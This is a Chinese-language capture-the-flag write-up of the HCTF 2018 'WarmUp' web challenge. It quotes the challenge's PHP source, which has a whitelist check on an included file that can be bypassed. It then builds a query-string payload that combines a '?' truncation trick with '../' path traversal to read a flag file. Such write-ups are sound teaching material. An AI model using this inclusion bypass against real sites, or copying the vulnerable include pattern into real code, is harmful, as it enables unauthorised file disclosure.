web-[HCTF 2018]WarmUp

打开页面,是一个大大的滑稽
查看源代码,有一个提示访问source.php
web-[HCTF 2018]WarmUp_第1张图片

访问source.php,得到源码

 
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
        	//设置白名单
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            
            //若$page未设置或为空 或 $page不是字符串,返回false
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }
            
			//若$page是$whitelist的值,返回true
            if (in_array($page, $whitelist)) {
                return true;
            }
            
            //$page末尾添加?   并返回添加?后 首个?之前的字符串
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            
            
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?> 

发现一个提示页面hint.php,访问得到一句话:flag not here, and flag in ffffllllaaaagggg
只有满足$_REQUEST['file']非空 && $_REQUEST['file']是字符串 && emmm::checkFile($_REQUEST['file'])为true那么就会include $_REQUEST['file']
上面的条件很容易满足,难的是要访问ffffllllaaaagggg
因为emmm::checkFile()函数说明只能包含source.phphint.php

关键代码:$_page = mb_substr($page, 0, mb_strpos($page . '?', '?'));
既然是以首个?截断
我们可以构造file = source.php?,这样无论如何都会返回true
?后面就是我们要访问的ffffllllaaaagggg

构造payload:
http://d021b8fe-3210-478c-b553-0cee7079e4bd.node3.buuoj.cn?file=source.php?/…/…/…/…/ffffllllaaaagggg

你可能感兴趣的:(BUUCTF)